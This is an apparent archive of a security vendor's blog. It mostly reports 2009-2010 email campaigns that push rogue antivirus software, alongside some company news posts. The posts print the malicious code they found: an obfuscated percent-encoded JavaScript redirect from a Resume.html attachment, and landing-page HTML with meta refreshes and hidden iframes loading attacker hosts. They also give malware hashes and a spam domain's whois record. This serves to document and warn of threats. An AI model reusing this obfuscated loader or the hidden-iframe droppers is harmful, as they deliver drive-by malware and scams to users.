Resume emails with attached file Resume.html leads to rogue AV software

August 19, 2010 5 Comments


MX Lab intercepts emails with the subject Resume, an attached file Resume.html and a very short email body:

Attached, please find

The attached HTML file contains the following code:

<SCRIPT LANGUAGE=”Javascript”><!–
//
function xhtmldecode(x){
document.write(unescape(x))
}
function runit(){
x=”%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%
72%65%66%72%65%73%68%22%20%63%6F%6E%74%65%6E%74%3D%22%30%3B
%75%72%6C%3D%68%74%74%70%3A%2F%2F%77%69%6D%62%65%72%74%2E%
6E%6C%2F%78%2E%68%74%6D%6C%22%3E%0D%0A”
xhtmldecode(x)
}
runit()
//–>
</script>

<SCRIPT LANGUAGE=”Javascript”><!–//function xhtmldecode(x){document.write(unescape(x))}function runit(){x=”%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%
3D%22%72%65%66%72%65%73%68%22%20%63%6F%6E%74%65%6E%74%3D%
22%30%3B%75%72%6C%3D%68%74%74%70%3A%2F%2F%77%69%6D%62%65%
72%74%2E%6E%6C%2F%78%2E%68%74%6D%6C%22%3E%0D%0A”
xhtmldecode(x)}runit()//–></script>

When opening the attached HTML file you are directed to a web site witht he following code:

PLEASE WAITING 4 SECOND...
  <meta http-equiv="refresh" content="4;
url=hxxp://brocuphdislock.cz.cc/scanner10/?afid=24">
</head><body>

<iframe src="hxxp://cherrysolo.ru:8080/index.php?pid=10"
style="visibility: hidden;" height="1" width="1"></iframe>
</body></html>

After 4 seconds you will get redirected to hxxp://brocuphdislock.cz.cc/scanner10/?afid=24. On our Mac computer we got the following screen.

It stayed like this for quite a while so I guess that the scripting of this site doesn’t work too well on a Mac computer. At MX Lab, we believe that this is a new campaign to distribute the rogua anti virus software antivirus_24.exe as mentioned in earlier blog articles:

Campaign with emails that lead to rogue AV software antivirus_24.exe continues
Malicious emails lead to rogue AV software antivirus_24.exe

Filed under Malware, Viruses Tagged with , ,

Malicious emails lead to rogue AV software antivirus_24.exe

August 7, 2010 2 Comments


MX Lab intercepted emails that leads to the rogue anti virus software with the executable antivurs_24.exe. The senders make use of well known brand names like Macy’s, Costco Photo Center and perhaps also other brands as well.

The URLs inside the message lead to a web site that hosts a malicious script and will offer you the option to download antivirus_24.exe later on.

When following this URL on our Mac we got the message “PLEASE WAITING 4 SECOND…”.

The web site has the following HTML code:

PLEASE WAITING 4 SECOND...
  <meta http-equiv="refresh" content="4;
url=hxxp://hoopdotami.cz.cc/scanner5/?afid=24">


</head><body>

<iframe src="hxxp://baymediagroup.com:8080/index.php?pid=10"
style="visibility: hidden;" height="1" width="1"></iframe>

</body></html>


We got the following screen below but I'm sure that on Windows it will be slightly different. Some Windows icons will be included of your hard drives and so on.




You will get to see some errors, your system is infected and the instructions lead you to download the malware. This part is obviously fake so please do not continue the process.


Virus Total permlink and MD5: 5be4b708a68687cb5490fe2caea49c82

Filed under Malware, Viruses Tagged with , ,

MX Lab Summer Sales, only €8 per mailbox per year!

August 3, 2009 Leave a comment


MX Lab is offering the Zero Hour Anti Virus and Managed Anti Spam for your mail server for € 8 per mailbox per year. For more information visit http://www.mxlab.eu/ and contact us.

Filed under MX Lab News Tagged with , , , , , ,

Rogue online anti virus scanner Antivirus Plus

March 27, 2009 3 Comments


Antivirus Plus is a rogue anti virus scanner. When visiting an URL like hxxp://myreallyty.com/su/in.cgi?18 – something I don’t recommend to do at home – an online virus scanner is started to check your computer system. It won’t take long before the first viruses, malware and trojans are detected.

The online virus scanner gives you the warning that you have several infections: I-Worm.Sobig, TrojanDropper.JS.Mimail and Backdoor.SdBot.gen being one of the most critical infections according to Antivirus Plus.

 

Antivirus Plus will soon gives you the warning that it can’t clean your computer and offers you the option to download additional software to do so.

The file Installer_70137.exe is downloaded and is known as:

Win32:Trojan-gen (Avast)
Trojan.Win32.Agent2.gnf (F-Prot, Kaspersky)
TrojanDownloader:Win32/Renos.BAO (Microsoft)
Troj/FakeAV-NT (Sophos)

Virus Total permlink and MD5: 916e0f7aef7f1ea6308fa886d41ed750.

Filed under Viruses Tagged with ,

Rogue anti virus program: Antivirus for Windows – New 2009 Version

March 11, 2009 2 Comments


MX Lab intercepted a message that caught our attention. Some time ago, a rogue anti virus/anti spyware program known as Antivirus 2009, XP Antivirus Protection, MSAntivirus 2008 and Vista Antivirus 2008 was promoted on the internet and in various spam emails.

It seems that this now is distributed under a new name “Antivirus for Windows – New 2009 Version”.

The email was sent from PC Protection <internet.clientservice@gmail.com> and contains the subject “Update your Antivirus for Windows.

The email looks like a mailing and contains an Unsubscribe, Forward and Update Profile links. However, when looking at all the links in the message, some links are invalid like the Report Abuse link that contains an URL to http://ss25..sourcecompmail.com/ – note the double point after ss25. The domains http://ss25.sourcecompmail.com/ or http://sourcecompmail.com/ are giving us an HTTP 404 error and contains no web site. It is very common to work from under a subdomain and pages under that domain without any root HTML pages.

The domain itself appears to be registered at Tucows with the following details:

[whois.tucows.com]
Registrant:
 Quattro Web Solutions
 13 Hares avenue
 Woodstock
 Cape Town,  7925
 ZA

 Domain name: SOURCECOMPMAIL.COM

 Administrative Contact:
    Honig, Paul  paul@quattro.co.za
    15 Wandel street
    Gardens
    Cape Town
    Cape Town,  7925
    ZA
    +27.4480099    Fax: +27.214619277

 Technical Contact:
    Desk, Help  domreg@ns.com
    322 South Marietta Street
    ww
    w
    Gastonia, WI 28052
    US
    +1.7048527000    Fax: +1.7048849011

 Registrar of Record: TUCOWS, INC.
 Record last updated on 28-Oct-2008.
 Record expires on 28-Oct-2009.
 Record created on 28-Oct-2008.

 Registrar Domain Name Help Center:

http://domainhelp.tucows.com

 Domain servers in listed order:
    NS3.NITRIC.CO.ZA
    NS2.NITRIC.CO.ZA   

 Domain status: clientTransferProhibited
                clientUpdateProhibited

When following the download links, a landing page is shown:

When filling in your email address and the activation code you are presented with a payment screen.

Recommendation: do not proceed with the payment process and do not download the program.

Filed under Email security, Viruses Tagged with , , ,

MX Lab includes MX Lab Email Archiving & Back up service as a standard

February 27, 2009 Leave a comment


MX Lab will offer the optional service MX Lab Email Archiving & Backup for free for each account on MX Lab AVAS Gateway or MX Lab Hosted Mail solution. This service will become available early March 2009 and the retention period for archived and stored emails will be 60 days.

Read the full press release.

Filed under MX Lab News Tagged with , , , ,

MX Lab Admin receives an update

June 2, 2008 Leave a comment


MX Lab provides a new major update of MX Lab Admin, the management interface for clients. The update includes new features, support for multiple languages, interface enhancements like date range selector tools, animated Flash charts, new statistics reports and more.

Filed under MX Lab News Tagged with , , , , , ,

MX Lab protects Comap Nordic email communication

October 12, 2007 Leave a comment


After providing email security for Comap Benelux, MX Lab extends its services to protect email communication for the domains comap.se/.no/.fi and .dk.

Filed under MX Lab News Tagged with , , , , , ,

Managed Anti Virus powered by Trend Mirco

October 12, 2007 Leave a comment


MX Lab offers a fully managed antivirus and comprehensive security protection against today’s complex, blended threats and web-based attacks using the Trend Micro™ OfficeScan™ technology. Visit MX Lab for more information.

Filed under MX Lab News Tagged with , , ,

Follow

Get every new post delivered to your Inbox.

Join 166 other followers